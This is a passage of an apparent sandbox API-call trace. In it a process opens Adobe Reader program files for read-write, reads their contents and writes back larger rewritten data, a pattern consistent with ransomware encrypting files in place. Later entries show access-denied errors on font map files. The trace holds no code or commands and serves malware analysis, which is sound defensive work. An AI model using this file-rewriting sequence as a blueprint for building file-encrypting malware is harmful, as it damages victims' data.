CloseHandle (hObject=0x1e4) returned 1 [0083.961] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInTray.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnonnotificationintray.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.961] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.962] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3ea [0083.962] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.962] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.962] ReleaseMutex (hMutex=0x168) returned 1 [0083.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="turnOnNotificationInTray.gif", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0083.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="turnOnNotificationInTray.gif", cchWideChar=28, lpMultiByteStr=0x1f8fc0c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="turnOnNotificationInTray.gif", lpUsedDefaultChar=0x0) returned 28 [0083.963] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3ea, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x2b1f2bc*=0x3ea, lpOverlapped=0x0) returned 1 [0083.964] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.965] WriteFile (in: hFile=0x1e4, lpBuffer=0x1eace08*, nNumberOfBytesToWrite=0x972, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesWritten=0x2b1f2d0*=0x972, lpOverlapped=0x0) returned 1 [0083.965] CloseHandle (hObject=0x1e4) returned 1 [0083.965] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.966] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.966] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4274 [0083.966] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.967] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.967] ReleaseMutex (hMutex=0x168) returned 1 [0083.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeHUN.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeHUN.htm", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMeHUN.htm", lpUsedDefaultChar=0x0) returned 13 [0083.967] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.969] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3274 [0083.969] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.970] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3274 [0083.970] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.970] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0083.970] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.971] CloseHandle (hObject=0x1e4) returned 1 [0083.971] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeFanHeitiStd-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobefanheitistd-bold.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.972] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.973] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x53e434 [0083.973] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.973] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.973] ReleaseMutex (hMutex=0x168) returned 1 [0083.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeFanHeitiStd-Bold.otf", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0083.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeFanHeitiStd-Bold.otf", cchWideChar=25, lpMultiByteStr=0x1f8fc0c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeFanHeitiStd-Bold.otf", lpUsedDefaultChar=0x0) returned 25 [0083.973] ReadFile (in: hFile=0x1e4, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.976] ReadFile (in: hFile=0x1e4, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.978] ReadFile (in: hFile=0x1e4, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0x2000, lpOverlapped=0x0) returned 1 [0083.979] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x53c434 [0083.979] ReadFile (in: hFile=0x1e4, lpBuffer=0x2665868, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2b1f278*=0x2000, lpOverlapped=0x0) returned 1 [0084.286] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x53c434 [0084.288] WriteFile (in: hFile=0x1e4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x2588, lpOverlapped=0x0) returned 1 [0084.288] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0084.288] WriteFile (in: hFile=0x1e4, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0084.288] WriteFile (in: hFile=0x1e4, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0084.289] WriteFile (in: hFile=0x1e4, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x2b1f28c*=0x2000, lpOverlapped=0x0) returned 1 [0084.289] CloseHandle (hObject=0x1e4) returned 1 [0084.289] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\83pv-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\83pv-rksj-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.290] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\83pv-RKSJ-H", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\83pv-RKSJ-H", lpFilePart=0x2b1f690*="83pv-RKSJ-H") returned 0x42 [0084.290] GetLastError () returned 0x5 [0084.291] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.291] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.291] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.291] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.291] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.292] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.292] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\83pv-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\83pv-rksj-h")) returned 0x20 [0084.603] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-ucs2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.604] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2C", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2C", lpFilePart=0x2b1f690*="90pv-RKSJ-UCS2C") returned 0x46 [0084.604] GetLastError () returned 0x5 [0084.604] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.604] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.604] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.604] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.604] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.605] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.605] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-ucs2c")) returned 0x20 [0084.605] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.606] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-5", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-5", lpFilePart=0x2b1f690*="Adobe-CNS1-5") returned 0x43 [0084.606] GetLastError () returned 0x5 [0084.606] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.606] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.606] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.606] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.606] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.607] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.607] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-5")) returned 0x20 [0084.607] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.608] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-1", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-1", lpFilePart=0x2b1f690*="Adobe-GB1-1") returned 0x42 [0084.608] GetLastError () returned 0x5 [0084.608] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.609] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.609] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.609] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.609] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.609] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.610] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-1")) returned 0x20 [0084.610] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-host"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.612] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Host", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Host", lpFilePart=0x2b1f690*="Adobe-GB1-H-Host") returned 0x47 [0084.612] GetLastError () returned 0x5 [0084.612] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.612] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.612] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.612] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.613] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.613] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.613] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-host")) returned 0x20 [0084.614] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.614] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-5", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-5", lpFilePart=0x2b1f690*="Adobe-Japan1-5") returned 0x45 [0084.614] GetLastError () returned 0x5 [0084.614] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.614] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.614] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.614] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.615] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.615] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.615] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-5")) returned 0x20 [0084.615] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.616] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-0", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-0", lpFilePart=0x2b1f690*="Adobe-Korea1-0") returned 0x45 [0084.616] GetLastError () returned 0x5 [0084.616] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.617] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.617] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.617] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.617] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.617] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.617] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-0")) returned 0x20 [0084.618] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.620] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-UCS2", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-UCS2", lpFilePart=0x2b1f690*="Adobe-Korea1-UCS2") returned 0x48 [0084.620] GetLastError () returned 0x5 [0084.620] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0084.620] LocalFree (hMem=0x69e2b0) returned 0x0 [0084.620] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0084.621] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0084.621] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.621] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0084.621] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-ucs2")) returned 0x20 [0084.622] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.623] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-UCS2", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-UCS2", lpFilePart=0x2b1f690*="ETen-B5-UCS2") returned 0x43 [0084.623] GetLastError () returned 0x5 [0084.623] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, 